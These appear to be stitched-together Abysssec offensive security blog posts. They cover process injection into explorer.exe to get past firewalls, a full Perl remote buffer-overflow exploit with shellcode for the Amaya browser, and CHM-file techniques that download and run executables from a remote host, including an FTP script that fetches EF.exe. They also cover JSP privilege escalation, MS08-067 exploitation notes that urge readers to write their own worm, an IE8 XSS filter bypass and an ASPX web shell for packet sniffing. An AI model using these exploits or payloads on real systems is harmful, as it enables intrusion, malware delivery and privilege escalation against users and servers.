Abysssec Security Research

Hello Friends .

First question is why Process  Injection ?

in this method we can attach evil Process to permitted Process . as you know , firewalls Permit to some Process , like : Internet explorer [IE] or Firefox or windows update or …  .  this Processes can connect to Internet very well [ often  ] .

Process injection , Dll injection , “PE injection “ are methods to bypass firewalls [This Methods called as  : Leak Firewall ] .

in dll injection , we injects dll  into an application process area, and references to his own malicious DLL to make firewall believes that it’s the application which is using the DLL .

Today when we talk about injection, we are talking about a DLL that is loaded into a running process’s memory.  as we know Windows is now designed for this, and injection techniques can be used by any application.  Some applications use it to add features to a closed-source program [for example : Babylon Dictionary is One of them ] .

I,m not intend to talk about these [dll ,process Injection ] at this time . and i just want  talk about Process injection [ or hijack] to bypass firewalls .

Attention To modeling :

Principle of application run [default ] :

when inclusion of a dynamic library [dll]   :

inserting malicious code in the process of confidence :

Used internet Explorer [trusted Software ] for injection :

The following illustration shows the general Code injection  with windows API method [virtualAllocEX(),..]

how to Inject Process : [with C cod ]

for firewall bypass we have 4 part :

- Open one process “P”
- Allocate memory remotely in “P” space
- Copy the code to remote process
- Create a thread to execute the code remotely
[will happen]

Example Of Process Injection In EXPLORER.EXE [code ]:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75

 
    #pragma comment(lib,"Shlwapi.lib")
    #pragma comment(lib,"ADVAPI32.LIB")
    #include <stdio.h>
    #include <windows.h>
    #include <Shlwapi.h>
    #include <tlhelp32.h>
    #define INJECT_EXE  "explorer.exe"
 
    typedef struct _RPar
    {
    DWORD dwDeleteFile;
    DWORD dwSleep;
    DWORD dwMessageBox;
    char Filename[1024];
    char string1[1024];
    char string2[1024];
    } RPar;
    DWORD __stdcall ThreadProc(RPar *Para)
    {
    FARPROC PDeleteFile = (FARPROC)Para->dwDeleteFile;
    FARPROC PSleep = (FARPROC)Para->dwSleep;
    FARPROC PMessageBox = (FARPROC)Para->dwMessageBox;
 
    PMessageBox(NULL,Para->string1,Para->string2,MB_OK);
 
    while(PDeleteFile(Para->Filename) == 0) {PSleep(1000);}
    return 0;
    }
    int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
    {
    DWORD dwThreadId,pID=0,dwThreadSize=2048;
    void *pRemoteThread;
    char ExeFile[1024];
    HANDLE hProcess,hSnap;
    HINSTANCE hKernel, hUser;
    RPar my_RPar,*pmy_RPar;
    PROCESSENTRY32 pe32 = {0};
    if( (hSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE )
    return 3;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    Process32First(hSnap, &pe32);
    do {
    if ( StrCmpNI(INJECT_EXE,pe32.szExeFile,strlen(INJECT_EXE)) == 0)
    {
    pID=pe32.th32ProcessID;
    break;
    }
    } while (Process32Next(hSnap,&pe32));
 
    if ( hSnap != INVALID_HANDLE_VALUE )
    CloseHandle(hSnap);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
    pRemoteThread = VirtualAllocEx(hProcess, 0, dwThreadSize, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
 
    WriteProcessMemory(hProcess, pRemoteThread, &ThreadProc, dwThreadSize,0);
    ZeroMemory(&my_RPar,sizeof(RPar));
    hKernel = LoadLibrary( "kernel32.dll");
    my_RPar.dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA");
    my_RPar.dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep");
    hUser = LoadLibrary( "user32.dll");
    my_RPar.dwMessageBox = (DWORD)GetProcAddress(hUser, "MessageBoxA");
    GetModuleFileName(NULL,ExeFile,1024);
    printf (ExeFile);
    strcpy(my_RPar.Filename, ExeFile);
    strcpy(my_RPar.string1, "HI Abysssec");
    strcpy(my_RPar.string2, "OK");
    pmy_RPar =(RPar *)VirtualAllocEx (hProcess ,0,sizeof(RPar),MEM_COMMIT,PAGE_READWRITE);
    WriteProcessMemory(hProcess ,pmy_RPar,&my_RPar,sizeof my_RPar,0);
    CreateRemoteThread(hProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pmy_RPar,0,&dwThreadId);
    FreeLibrary(hKernel);
    CloseHandle(hProcess);
    system("tasklist");
    return 0;
    }

what Happens When Firewall bypass ?

in servers :

we can call "Internet explorer" or  other trusted Application with [ASP.NET Execute Permission ] and run backdoor in any port .

with this method , we can telnet to open port of server without any worry  .

In Client :

Backdoor , Trojans , bad software , connect to internet without Access .

Real Word [ Discovered By Abysssec ] test :

Vulnerability Firewall [Outpost 2009 ] :

http://www.agnitum.com/products/outpost/

You can Inject Process In IE7 or Mozilla Firefox [default Trusted ] .

[Sorry For more information , This bug is not fixed  , You can test it with Process Injector tools  ].

www.tarasco.org

[pinjector.exe] :

Download Link + source :

http://www.tarasco.org/security/pinjector/index.html

Final deduction:

1- We can Bypass some firewalls : Don't checked  Allocated Memory in Trusted Process .

2- Dll , Process , PE injection is useful way to run Process without new Prosess ID [PID]  .

In Future :

1- Usage Of these Method In other bypass Protections [hybrid or frees  Protection ]

2 - PE INJECTION , why , what , where !?

More Information :

http://www.tarasco.org/security/pinjector/Win32.Design.Flaws.pdf

http://www.firewallleaktester.com/docs/leaktest.pdf

http://www.bluenotch.com/files/Shewmaker-DLL-Injection.pdf

--------------------------------------------------------------------------------------

Happy new year  and holy days

god speed you

Daphne

Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit

Vulnerability discovery & Exploit by SkD

We will start with a description of the affected software:

Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web. Browsing features are seamlessly integrated with the editing and remote access features in a uniform environment. This follows the original vision of the Web as a space for collaboration and not just a one-way publishing medium.

The vulnerability lies in the way Amaya (version 11.0.1 and below) parses HTML tags. Certain tags trigger different vulnerabilites, mostly overflows but each has a different environment for exploitation.

I selected that the “<td nowrap>” and the “<title(overflow)>” tags were the most convenient to use for the exploit.

Here is a picture of the debugger’s state when the buffer overflow occurs with the “<td nowrap>” tag:

As we can see the EIP is fully controllable but to exploit the issue there are quite a few problems:

• The buffer can only have characters from (hex) 0×00 to 0x7f, 0×80 => and above will corrupt the buffer with uneeded characters so the putting the shellcode and finding return addresses will be a problem.
• Registers point at random places except for ESI which can be controlled to point to a specified location with a correct calculation.
• Finding a JMP ESP/CALL ESP in one of the Amaya’s native modules will be hard because none of them include the allowed characters (we want to make it universal).
• Heap layout is randomized.

Please note that I was working on this on Windows Vista SP1 so it may differ with XP, 2003, etc.

Okay, so what can we do? This won’t be exploited the normal way with the classic jmp esp or there isn’t any SEH handlers to exploit so what is there to do? Like I mentioned in the previous list, ESI points to a controllable region in the stack. This region will vary if a calculation for the junk characters is not correct (you will see what I am talking about in the exploit code).  So to combat this problem we must look to the heap for the clean buffer before transformation. Guess what? EDI points close to this but it is random so I cannot just decrease EDI by a static number!  What I did was a similar method to egghunting as in heap overflows but my new method is called, shellhunting. The conclusion is that the shellhunter must be alphanumerical (well, mostly) and it must look for the shellcode in the heap pointed by EDI.

This is a advanced stack overflow exploit which also involves the heap! Please remember that this will only work on Vista SP 1 ( I tested it on XP but different heap layouts again made it a hassle for me to change :) ).

This is the stack and memory when the buffer involves characters over 0×80 (this is the shellcode):

And here is the shellcode so you can compare!

my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";

Very corrupted data, like that we cannot execute anything because of malformed instructions (the decoder for the alphanumerical shellcode will have also no chance to work).  It is clear that the only way will be to look at the heap.

Now I will describe how my shellhunter works!

1. The shellhunter will start as being 98% alphanumerical so it can be successfully executed.
2. The “lookout” values must not cause an exception because we will redirect the execution flow to those values!
3. It will loop and search the heap for the “lookout” values INFRONT of the shellcode.
4. Once the “lookout” values are located, PUSH EDI and then RETN to that address.

This is efficient and it will work one-hundred percent on every try the browser parses the HTML page.

You can also see that I am using an addition with the $additionaddr variable, this is because the variable cannot be on the heap next to the corrupted data! So we basicially add a few bytes to the variable in the register EAX that holds the $additionaddr that will turn into the “lookout” value so the shellhunter can easily compare data in the heap!

I hope you learned something today ladies and gents! The exploit is included below!

#!/usr/bin/perl
#
# Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit
# Found/Exploit by SkD (skdrat@hotmail.com)
#                (skd@abysssec.com  )
# -----------------------------------------------
# This is advanced buffer overflow exploitation using
# my new method called shellhunting :)
#
# Get more information about this at http://abysssec.com
#
# Exploit works only on a fully patched Vista SP1, but you
# may need to click 'Refresh' to make the shellcode exec
# sometimes.
#
# Note: Author has no responsibility over the damage you do with this!
 
use strict;
use warnings;
use IO::Socket;
 
my $html;
my $port_listen = 80; # change this to your desired port!
my $listenip = "127.0.0.1"; # change this to your desired IP!
 
# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";
 
# my own shell hunter.. :) it is 98% alphanumerical.
# 2nd variant of the shellhunter, to make the exploit more reliable..
my $shellhunter = ("\x58\x58\x40\x40").("\x47" x 4).("\x42" x 6).     #inc edi
("\x42" x 24).("\x42" x 24).("\x39\x07\x75\x8b\x71\x71").
("\x47\x47\x47\x47\x57\xFF\x65\x78\x77\x76");
my $overflow = "\x42" x 158;
my $overflow2 = "\x42" x 4;
my $overflow3 = "\x43" x 430;
my $overflow4len = 977 - ((length($shellhunter) - 7));   #very important calculation
my $overflow4 = "\x44" x $overflow4len;
my $sled = "\x42" x 12;
my $sled2 = "\x41" x 24;
my $eip2 = "\x37\x55\x03\x10";  #10035537 call ecx, this won't be used
my $eip1 = "\x30\x4f\x01\x10"; #10014F30 call esi, this will be used.
my $heapaddr = "\x50\x0e\x08\x10";    #valid char for buffer, heap address
my $lookout = "\x37\x65\x41\x45" x 40;      # 45446537    look out values <-
my $lookout2 = "\x37\x65\x41\x45\x41" x 4;      # 45446537                <-
my $lookout3 = "\x37\x65\x41\x45\x41\x41" x 4;      # 45446537            <-
my $lookout4 = "\x37\x65\x41\x45\x41\x41\x41" x 4;      # 45446537        <-
my $additionaddr = "\x35\x65\x41\x45";    #used for an addition in the shellhunter  (+2)
my $nopsled = "\x90\x90\x90\x90\x90\x90";
my $jmp = "\x75\x0c";
print "[x] Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit\n";
print "[x] Found/Exploit by SkD (skdrat@ hotmail.com)(skd@ abysssec.com)\n";
 
while(1)
{
my $sock=new IO::Socket::INET(Listen=>1,LocalAddr => $listenip,LocalPort=>$port_listen,Proto=>'tcp');
die unless $sock;
print "[x] Waiting for clients on port ".$port_listen."..\n";
my $s;
while($s=$sock->accept()){
print "[x] Got a client!\n";
my $request = <$s>;
print $s "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
print "[x] Serving Exploit HTML page :)\n";
print $s "\n".
"\n".
"\n".
"
\n".
"
 
\n".
"\n".
"\r\n";
sleep(0.5);
close $s;
print "[x] Done!\n";
}
}

Hi .

In this post i wanna talk about Execute with CHM file or be honest How we can run Trojan, Backdoor In CHM file ? and we will have a few talk Bypass Script Protection In IE .

A CHM help file has a “.chm” extension. It has a set of web pages written in a subset of HTML and a hyperlinked table of contents. CHM format is optimized for reading, as files are heavily indexed. All files are compressed together with LZX compression. Most CHM browsers have the capability to display a table of contents outside of the body text of the help file.

Engine Of CHM :

CHM run HTML page Based On Internet Explorer Engine .

when you run “VBSCRIPT” or “Activex”  or “Object” with Internet Explorer 7 or higher , Script Protection (Activex Security Control) , Alert To  User & Block Script .

when we are during running  a CHM file , we Can Run & Execute “Object” + “Vb Script” + “JavaScript “ Without Any Error , but If  our Script  inclusive  ActiveX control , We will See a Basic Alert .

Execute IN CHM :

we Need A Program To Create CHM file , I like to  USE WINCHM (free Edition) :

http://www.softany.com/winchm/

For Edit VBSCRIPT  [With IDE] :

http://www.vbsedit.com/

Offline Mode (Intro) :

With This Object ID :

{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}

Call “Windows Script Host Shell Object ” with Object :

Example :
<html>
<object id=”wsh”
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
<script>
wsh.Run(“c:\windows\system32\calc.exe”);
</script>
</html>

Or  :

<HTML>
<SCRIPT>
function PROCJavascriptRunProgramParameter( programNameS,
parameterS )
{
var shell = new ActiveXObject(“WScript.Shell”);
var quoteS = String.fromCharCode( 34 );
shell.run( quoteS + programNameS + quoteS + ” ” + parameterS, 1,
false );
self.close();
}
</SCRIPT>
<BODY ONLOAD=’PROCJavascriptRunProgramParameter( “C:/windows/system32/calc.exe”, “names.nsf” );’>
</BODY>

Online Mode (Backdoor & Script Bypass Mode ) :

we have three Step to do :

1- Download .EXE file (without User InterAction)
2- Save File in Victim PC .
3- RUN It .

for download with VBSCRIPT  I USED This Objects :

-Microsoft.XMLHTTP
-MSXML2.ServerXMLHTTP
-WinHttp.WinHttpRequest.5.1
-WinHttp.WinHttpRequest

Following This Example :

<script language=vbscript>
Dim Http
Set Http = CreateObject(“WinHttp.WinHttpRequest.5.1″)
URL = “http://abysssec.com”
‘Send request To URL
Http.Open “GET”, URL, False
Http.Send
‘Get response data As a string
BinaryGetURL = Http.ResponseBody
</script>

SAVE FILE  [ Achilles heel  IN CHM ] :

Save File & Execute Objects , Run Activex In IE & CHM .

IF You Can Find a way to bypass ActiveX Alert You can Find lot’s of BUG‘s .

Example OF Bug :

http://www.milw0rm.com/exploits/719 [2004]

Activex Alert :

Note : we have some bypass trick maybe we disclosure a few of them here soon .

But until that Time You can use This method for Download [FTP Client ] :

Option Explicit
Dim objFSO, objMyFile, objShell, strFTPScriptFileName
Dim strLocalFolderName, strFTPServerName, strLoginID, strFTPServerDir
Dim strPassword, strFTPServerFolder, objPassword, objFolder,FolderContent, fso, CleanPath, file, Flag

‘Change this, foldername = local dir (where files must be ftp’d TO)
strLocalFolderName = “c:\”

‘ Server where you are ftp’ing TO
strFTPServerName = “abysssec.com”

‘ Username you use to ftp
strLoginID = “test”

‘ Initialize variables
strPassword = “test”
strFTPServerDir = “/www”

‘ Change this to the folder where the files are on the source server
strFTPServerFolder = “/www”

‘The follow lines of code generate the FTP script file on the fly,
‘because the directory name changes every time its run

strFTPScriptFileName = strLocalFolderName & “\FTPScript.txt”

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

If (objFSO.FileExists(strFTPScriptFileName)) Then
objFSO.DeleteFile(strFTPScriptFileName)
End If

Set objMyFile = objFSO.CreateTextFile(strFTPScriptFileName, True)
‘objMyFile.WriteLine (“ftp -s open ” & strFTPServerName)
objMyFile.WriteLine (“open ” & strFTPServerName)
objMyFile.WriteLine (strLoginID)
objMyFile.WriteLine (strPassword)

‘strFTPServerDir = InputBox(“Enter directory from which to ftp:”)

‘objMyFile.WriteLine (“cd ” & strFTPServerFolder & strFTPServerDir)
objMyFile.WriteLine (“cd ” & strFTPServerFolder)
‘objMyFile.WriteLine (“bin”)
objMyFile.WriteLine (“lcd ” & strLocalFolderName)
objMyFile.WriteLine (“get EF.exe”)
objMyFile.WriteLine (“bye”)
objMyFile.Close

Set objFSO = Nothing
Set objMyFile = Nothing

‘The following code executes the FTP script. It creates a Shell
‘object and run FTP program on top of it.
Set objShell = WScript.CreateObject( “WScript.Shell” )
objShell.Run (“ftp -s:” & chr(34) & strFTPScriptFileName & chr(34))
‘objShell.Run (strFTPScriptFileName & chr(34))
Set objShell = Nothing

Set fso=CreateObject(“Scripting.FileSystemObject”)
CleanPath=”c:\”

For Each file In fso.GetFolder(strLocalFolderName).Files
Flag = StrComp(file, strFTPScriptFileName ,1)
if Flag = 0 then
file.delete
end if
Next

For Execute You can use it:

<script language=vbscript>
set  shell = CreateObject(“WScript.Shell”)
shell.run( “cmd.exe” )
</script>

——————————————————————————————————————————————-

Bypass Script Protection in CHM :

When You Run This Exploit [ Last Of IE 7 Exploit In this Time ] :

http://www.milw0rm.com/exploits/7410

This Exploit Detect By IE Script Security Protection . You Can Run This Exploit in CHM & Don’t Worry For Execution through  “Heap Spray” Method  .

Test IT :

http://abysssec.com/files/Execute-with-IE.chm

OK , deduction :

1 – We can put Backdoor & Trojan in CHM files [Fake Book ]

2- We Can Run IE Exploit in CHM files .

3- We Can Execute & Download & Upload with chm files .

4- We Can Run All COM & DLL Objeects with it .

In future :

1- talk about Heap Spray Method  .

2- Talk About Fuzzing OBJECT .

3- Talk About Bypass Activex Question in .CHM [ If i found It !!!!]

Question ?

———————————————–

abysssec comment problem solved fill free to write your comment and mail your request and questions to us .

DAphne

In the name of God.

Hello my friend & all readers  ,

Tomcat [jsp]  &  Jrun  [ColdFusion] & some HTTP server , when called “JSP” function in windows , Attackers can  Privilege Escalation .

This bug Emanate from differ Kernel in windows and Linux .

Example Vulnerable Software : “PLESK” or many of web management systems  Used them , you can find them .

TOMCAT : [http://tomcat.apache.org/]

Jrun : [http://www.adobe.com/products/jrun/]

Diagram of Run  web Application In windows [ Attention in user mode & kernel Mode ] :

.

.

Diagram of Run  web Application In Linux [ Attention in user mode & kernel Mode ] :

.

.

Please Attention to diragrams , I don’t mean describe win & lin kernel , But you see , in windows services security & Application Security  are in user mode & you are not face to face with kernel  , But in  linux we have a different Calling Services & user access .

when “JSP” web application Run in Linux [ with tomcat  or other Server ] , You can use Privilege of owner [runner] user . but , when you run This in  windows [TOMCAT or Jrun web server ]   ,  “JSP” Application take jrun or tomcat Access .

They have Administrator Access . Therefor You have Admin level process.

use [getRuntime().exec] Function in [JSP] you can run Process .

This is a test  . [Detail]

import java.io.IOException;Runtime.getRuntime().exec("\"c:/program files/windows/notepad.exe\"");

here is one of published PoC For this vulnerabilities

we can run it , [abysssec.jsp] -> :

< %@ page import="java.util.*,java.io.*"%>
< %
%>

# milw0rm.com [2008-11-28]


hi again

i,m sure you know about this ciritical / wormable  vulnerability  . immediate after releasing vulnerability Win32.Gimmiv worm released too . this worm use this vulnerability and will run after first execute as a windows service . but i,m sure this worm is not last worm based on this vulnerability .

this vulnerability specifically exists on Server Service Remote Procedure Call (RPC) handling, where an attacker could perform a stacked-based buffer overflow by sending a request to a vulnerable function, “NetPathCanonicalize()”. In this way an attacker may escalate privileges, using the named pipe “\\pipe\srvsvc” to access other machines over the network via the pipe’s file sharing service.

exploiting this vulnerability On win 2k and XP SP1 Sp2 and Sp3  is really fun just rpc requset to based on 4b324fc8-1670-01d3-1278-5a47bf6ee188 to getting reliable eip and code executing . in windows xp sp1 and 2k and of course windows xp sp2 and sp3 with no dep you need just a jmp or call esi or edi register for code executing .

and about windows xp sp2 and sp3 with dep :

you can use address of NtSetInformationProcess call  in ACGENRAL.DLL for disable DEP  of course you need Scratch ( read/write static memory location) and you can find that in ACCGENRAL.dll too .

hd moore independent security researcher used this method for executing shellcode . in windows xp sp3 you can use this method  (using pre-process disable in ACCGENRAL.dll ) (of course with differing address of calling NtSetInformationProcess()) .

from hdm :

The actual function we use to disable NX looks like this:

push    4
lea     eax, [ebp+arg_0]
push    eax
push    22h
push    0FFFFFFFFh
mov     [ebp+arg_0], 2
call    ds:__imp__NtSetInformationProcess@16
i wrote my own reliable exploit and maybe in future i public that for all

and about GIMMIV  worm :

full discussion :

http://community.ca.com/blogs/securityadvisor/archive/2008/10/27/ms08-067-wormable-vulnerability-patched.aspx

The executable “WinbaseInst.exe” is the worm component you can see  worm service after executing binary following this picture :

you can be sure this worm use this vulnerability from founded UUID in basesvc.dll in %SystemRoot%\system32\wbem

after worm scanned and found vulnerable system using 4b324fc8-1670-01d3-1278-5a47bf6ee188 worm run download and execute shellcode following this picture :

this worm use random number and random server for downloading files . i,m sure this worm  have different compiled version (for leaked servers and AV’s ) . maybe in another post i discuss about this worm completely.

you can read full post about reversing ms08-067 patch here :

http://www.dontstuffbeansupyournose.com

next post will be patch analysis part 1

for now test your skills for write your own worm with this vulnerability .

best regards and have nice hacking

IE8 is a new Microsoft browser, the integrity of its CSS2.1 support, HTML5 support,
built-in development tools and so on. IE8 in the browser security on a very big improvement, not a
built-in unloading the Xss Filter, non-durable type of cross-site scripting attacks do a relatively good
protection. However, 80 sec in the test IE8 found, IE8 the Xss Filter there are Vuln, resulting
in some version of the eastern countries simply can not stop the URL Xss for example,
in the Persian version, use some simple data can Bypass Filter out the strategy IE8.

Vulnerability analysis: As IE8 Xss Filter in the filter to take the coding system is built-in encoding,
in the Persian version will be gb2312, in some other Eastern countries will adopt the appropriate wide-byte coding.
Submitted a non-coding sequences such as% c1 <will be IE8 as a normal character for the East Filter keyword matching,
and in the pages displayed, because of their pages will be designated a UTF-8 encoding for example, in the analytical
time % c1 <is not a valid UTF8 encoding, this will be treated as two characters,resulting in a <bypass the check, this inconsistency has led to the formation of Vuln.
Vuln that: assume that there are web script:


<?php
header("Content-Type: text/html; charset=utf-8");
echo $_GET[c];
?>


In the east of the country IE8 system, if the conduct of conventional XSS such as:

.php?c=<script>alert()</script>

IE8 security strategy will be to stop, but if the
The code can bypass the ie8 xss filter and implementation.

vulnerability state: this vulnerability reported to microsoft (by chinese hacker ) and is awaiting a response.

BUG IN WINPCAP

I feel God Is here .

Hi dear , I’M Daphne , My job is Penetration Tester (Pen-Tester) , I write About This Subject and Around  .

Pent-Test is Cool & funny job with hacking interesting subject.

anyway ….

I use winpcap 4.2(last version)

http://www.winpcap.org/install/default.htm

what is winpcap :

WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.

WinPcap consists of a driver, that extends the operating system to provide low-level network access, and a library that is used to easily access the low-level network layers. This library also contains the Windows version of the well known libpcap Unix API.

How to load winpcap in windows :

BUG :

when Administrator or Other Power users in windows summon winpcap driver (such as wireshake or nmap or cain or …) driver loaded !

but , when close program , winpcap driver still in memory , That’s it .

when driver not unload , Guest user or IIS_User can load this driver in kernel level , and SNNIFF Admin Packet in administrator Level or get  Administrator privilege .

I sniff packet with win dump in guest mod .
http://www.winpcap.org/windump/install/default.htm

Ok , I write This little tools for iis7 – iis6 in windows 2003 – 2008 :

usage :

load wireshake or other tool that run winpcap driver .

rename windump.exe to packet.exe and upload near winpcap.aspx and run it .

and then you can sniffed packed in 1.txt /

winpcap.aspx

<%@ Page Language=”VB” Debug=”true” %>
<%@ import Namespace=”system.IO” %>
<%@ import Namespace=”System.Diagnostics” %>
<script runat=”server”>
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
‘ Change Path Of tcpdump
Dim myProcessStartInfo As New ProcessStartInfo(Server.MapPath(”packet.exe”))
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,”<”,”&lt;”)
mystring=replace(mystring,”>”,”&gt;”)
result.text= vbcrlf & “<pre>” & mystring & “</pre>”
End Sub</script>
<form runat=”server”>
New Method Of Packet Sniffing In web whith Public Accesss .
<br />
This Program Run is AS IS !
<strong><span class=”style-2″>Serve rip</span></strong> :<span class=”style-2″>  <%=request.ServerVariables(”LOCAL_ADDR”)%></span><br>
<strong><span class=”style-2″>Machine Name</span></strong> :<span class=”style-2″> <%=Environment.MachineName%></span><br>
<strong><span class=”style-2″>Network Name</span></strong> :<span class=”style-2″> <%=Environment.UserDomainName.ToString()%></span><br>
<strong><span class=”style-2″>User Name</span></strong> :<span class=”style-2″> <%=Environment.UserName%></span> <br>
<strong><span class=”style-2″>OS Version</span></strong> :<span class=”style-2″> <%=Environment.OSVersion.ToString()%></span><br>
<strong><span class=”style-2″>IIS Version</span></strong> :<span class=”style-2″> <%=request.ServerVariables(”SERVER_SOFTWARE”)%></span><br>
<strong><span class=”style-2″>HTTPS</span></strong> <span class=”style-2″>: <%=request.ServerVariables(”HTTPS”)%></span><br>
</tr>
<br />
Tested On Windows vista , IIS7 .
<br />
<h5>Discover By “DAPHNE IDEA SECURITY ” .</h5>
<br />
Exp: -i 6 -w “c:\windows\temp\packet.txt”
<hr />
<asp:Label id=”L_p” style=”COLOR: #0000ff” runat=”server” width=”80px”>TCP DUMP PATH:</asp:Label>
<br />
<label><%=Server.MapPath(”packet.exe”)%></label>
</asp:TextBox>
<br />
<asp:Label id=”L_a” style=”COLOR: #0000ff” runat=”server” width=”80px”>Arguments</asp:Label>
<asp:TextBox id=”xcmd” style=”BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid” runat=”server” Width=”300px”>-D</asp:TextBox>
<br />
<br />
